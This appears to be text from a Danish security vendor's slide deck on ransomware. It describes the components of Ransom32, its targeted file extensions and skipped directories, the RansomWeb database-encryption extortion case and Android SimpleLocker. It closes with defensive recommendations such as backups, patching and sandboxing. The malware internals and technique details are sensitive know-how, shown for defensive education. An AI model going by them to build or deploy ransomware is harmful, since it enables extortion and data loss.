Kilder: http://blog.emsisoft.com/2016/01/01/meet-ransom32-the-first-javascript-ransomware/
http://www.computerworld.com/article/3018972/security/ransom32-first-of-its-kind-javascript-based-ransomware-spotted-in-the-wild.html
Ransom32 - Unwrapping the behemoth
• Automatically unpack using script language
implemented in WinRAR
• Execute the “chrome.exe” file contained in the archive
• “chrome” contains a copy of the GPL license
agreement.
• “chrome.exe” is a packaged NW.js application and
contains the actual malware code as well as the
framework required to run the malware.
• “ffmpegsumo.dll”, “nw.pak”, “icudtl.dat” and
“locales” contain data that are required by the
NW.js framework to function properly.
• “rundll32.exe” is a renamed copy of the Tor client.
• “s.exe” is a renamed copy of Optimum X Shortcut,
a utility to create and manipulate Desktop and
start menu shortcuts.
• “g” contains the malware’s configuration
information as configured in the web interface.
• “msgbox.vbs” is a small script that displays a
customizable popup message and is used to
display the configured message box.
• “u.vbs” is a small script that enumerates, and
deletes all files and folders in a given directory.
The content of the Ransom32 SFX archive
The “g” file contains the malware’s configuration formatted as JSON
Ransom32
Files with the following file extensions are being targeted:
*.jpg, *.jpeg, *.raw, *.tif, *.gif, *.png, *.bmp, *.3dm, *.max,
*.accdb, *.db, *.dbf, *.mdb, *.pdb, *.sql, *.*sav*, *.*spv*,
*.*grle*, *.*mlx*, *.*sv5*, *.*game*, *.*slot*, *.dwg, *.dxf,
*.c, *.cpp, *.cs, *.h, *.php, *.asp, *.rb, *.java, *.jar, *.class,
*.aaf, *.aep, *.aepx, *.plb, *.prel, *.prproj, *.aet, *.ppj, *.psd,
*.indd, *.indl, *.indt, *.indb, *.inx, *.idml, *.pmd, *.xqx, *.xqx,
*.ai, *.eps, *.ps, *.svg, *.swf, *.fla, *.as3, *.as, *.txt, *.doc,
*.dot, *.docx, *.docm, *.dotx, *.dotm, *.docb, *.rtf, *.wpd,
*.wps, *.msg, *.pdf, *.xls, *.xlt, *.xlm, *.xlsx, *.xlsm, *.xltx,
*.xltm, *.xlsb, *.xla, *.xlam, *.xll, *.xlw, *.ppt, *.pot, *.pps,
*.pptx, *.pptm, *.potx, *.potm, *.ppam, *.ppsx, *.ppsm,
*.sldx, *.sldm, *.wav, *.mp3, *.aif, *.iff, *.m3u, *.m4u, *.mid,
*.mpa, *.wma, *.ra, *.avi, *.mov, *.mp4, *.3gp, *.mpeg,
*.3g2, *.asf, *.asx, *.flv, *.mpg, *.wmv, *.vob, *.m3u8, *.csv,
*.efx, *.sdf, *.vcf, *.xml, *.ses, *.dat
The malware will not attempt to
encrypt any files if they are
located in a directory that contains
any of the following strings:
:\windows\
:\winnt\
programdata\
boot\
temp\
tmp\
$recycle.bin\
Ransom32
A web interface allows
you to see how many
systems the malware
has infected, how many
Bitcoins it earned and
allows you to further
customize the malware
The ransom note displayed by the malware
Ransomweb
Ransomweb that encrypts websites and web servers
•
High-Tech Bridge:
•
•
•
•
•
•
In December 2014, our security experts discovered a very
interesting case of a financial company website compromise: the
website was out of service displaying a database error, while the
website owner got an email asking for a ransom to “decrypt the
database”. Web application in question was pretty simple and
small, but very important for business of the company that could
not afford to suspend it, neither to announce its compromise.
Careful investigation that we performed revealed the following:
The web application was compromised six months ago, several
server scripts were modified to encrypt data before inserting it
into the database, and to decrypt after getting data from the
database. A sort of “on-fly” patching invisible to web application
users.
Only the most critical fields of the database tables were
encrypted (probably not to impact web application performance a
lot). All previously existing database records were encrypted
accordingly.
Encryption key was stored on a remote web server accessible
only via HTTPS (probably to avoid key interception by various
traffic monitoring systems).
During six months, hackers were silently waiting, while backups
were being overwritten by the recent versions of the database.
At the day X, hackers removed the key from the remote server.
Database became unusable, website went out of service, and
hackers demanded a ransom for the encryption key.
RansomWeb: Crooks Start Encrypting
Websites And Demanding Thousands
Of Dollars From Businesses
Thomas Fox-Brewster Jan 28, 2015 @ 07:36 AM
In another startling development in the world of cyber crime, malicious hackers have
started taking over website servers, encrypting the data on them and demanding
payment to unlock the files. A large European financial services company, whose
name was not disclosed, was the first known victim of this potentially businessdestroying attack, according to Swiss security firm High-Tech Bridge, which
investigated the breach in December 2014.
The security firm labelled the attack RansomWeb. The brazen techniques used and
the high ransom represent a more aggressive take on ransomware – malware which
encrypted people’s PCs and asked for payment, typically between $100 and £1,000.
Though only a handful of attacks have been seen, many expect such extortion to
grow rapidly in 2015. The initial attack started six months’ prior to the victim’s website
being shut down by the hackers, who were surreptitiously locking up the most critical
data on the server using “on-the-fly” tweaks to the site’s PHP code functions. The
criminals stored the key to decrypt the data on their own remote web server
accessible only via HTTPS encrypted communications, supposed to guarantee no
one with visibility on those connections could get access to the data but them. As
soon as they pulled the key and data was no longer being silently encrypted and
decrypted, the website was knocked out of action. That’s when employees at the
financial services firm were sent emails from a Gmail account, demanding the firm
pay $50,000 to get their website back. They threatened to increase the price by 10
per cent with every passing week.
http://www.forbes.com/sites/thomasbrewster/20
15/01/28/ransomweb-50000-dollar-extortion/
Android SimpleLocker
• May 2014 – Simplelocker appears in Ukraine
• Asks for $22 USD using Monexy
• Uses TOR for C&C
• Checks SD card for:
• jpeg, jpg, png, bmp, gif, pdf, doc, docx, txt, avi, mkv,
3gp, mp4
• Unlike Cryptolocker, Encryption key is hardcoded on the
malware. Encrypted files are appended with “.enc”.
Anbefalinger
Anbefalinger
Awareness
Bassale
kontroller
Opdateringer
Rettigheder
Backup
Forberedelse
Sandbox – emuleret afvikling
• De indsamlede data kan afprøves i en sandbox for at verificere om de er skadelige.
• Vil afsløre exploits, download af yderligere malware og call back.
• Mistænkelig adfærd eller trafik bliver synlig.
Virtual Analysis
• Win 7
• Office10
• Adobe 11
• Win XP
• Office07
• Adobe 10
• Windows
Server
Hvad kan vi gøre? - Praktiske anbefalinger (1)
• Sikkerhed i dybden: Anvend forskellige og overlappende sikkerhedsforanstaltninger, så der beskyttes med
single-point-of-failure i enkelte foranstaltninger eller teknologier
• Basale kontroller: Hold fokus på basale kontroller – husk den løbende opfølgning
• Overvågning: Mange organisationer opdager først brud på sikkerheden, når de får et opkald fra politiet
eller en kunde. Overvågning af logfiler og change management kan give tidligere advarsel
• Antivirus er ikke nok: Antivirus fanger stadig mange angreb, men I oplever også mange angreb med unik
malware og udnyttelse af dag-0-sårbarheder, som kræver andre værktøjer
• Endpointbeskyttelse: Endpoints skal beskyttes af mere end antivirus - husk opdateringer, begrænsede
rettigheder, websikkerhed, device kontrol
• Patch straks: Angribere får ofte adgang ved hjælp af simple angrebsmetoder, som man kan beskytte sig
mod med et opdateret og godt konfigureret it-miljø samt opdateret anti-virus
• Krypter følsomme data: Hvis data bliver tabt eller stjålet, er det meget sværere for en kriminel at misbruge
• Beskyt krypteringsnøgler: Hvis krypteringsnøglerne kompromitteres, kompromitteres sikkerheden også
• To-faktor-autentifikation: Dette vil ikke eliminere risikoen for, at passwords bliver stjålet, men det kan
begrænse de skader, der kan ske ved misbrug af stjålne legitimationsoplysninger
Hvad kan vi gøre? - Praktiske anbefalinger (2)
• Mennesker: Awareness er stadig vigtigt. Undervis dine ansatte i vigtigheden af ​sikkerhed, hvordan man
opdager et angreb, og hvad de skal gøre, når de ser noget mistænkeligt
• Hold adgangen til data på et ”need-to-know” niveau: Begræns adgangen til systemerne til det nødvendige
personale. Sørg for, at have processer på plads til at lukke for adgangen igen, når folk skifter rolle eller job
• Husk fysisk sikkerhed: Ikke alle datatyverier sker online. Kriminelle vil manipulere med computere,
betalingsterminaler eller stjæle dokumenter
• Backup: Hvis alle andre foranstaltninger fejler, kan en backup redde data. Husk beskyttelse af backup
medierne…
• Incident response: Planlæg efter, at der vil ske hændelser - følg løbende op på hvordan, og hvor hurtigt,
incidents opdages og håndteres, så reaktionen løbende kan forbedres
• Opfølgning: Glem ikke de basale kontroller. Hold fokus på bedre og hurtigere opdagelse gennem en
blanding af mennesker, processer og teknologi
• Trusselsbilledet: Hold øje med trusselsbilledet for løbende at kunne tilpasse sikkerhedsløsningen. Husk at
”one-size fits all” ikke holder i virkeligheden
• Riskovurdering: Er du mål for egentlig spionage, så undervurder ikke vedholdenheden, ekspertisen og
værktøjerne hos din modstander
Risikobegrænsning
• Risikoen kan ikke fjernes, kun begrænses
• Sikkerhed kan ikke købes som produkt
• Sikkerhed opnås ved en blanding af
• Procedure & ledelse (Management issues)
• Design, værktøjer og tekniske løsninger
• Løbende overvågning og vedligeholdelse
• Resultat: Formulering af sikkerhedspolitik og implementering af sikkerhedssystem
Hold dig opdateret
Abonnér på Dubex’ nyhedsbrev
Besøg
www.dubex.dk
www.dubex.dk/update/
Følg Dubex på LinkedIn & Twitter
Deltag på Dubex’ arrangementer
twitter.com/Dubex
www.linkedin.com/company/dubex-as
http://www.dubex.dk/arrangementer/
Tak!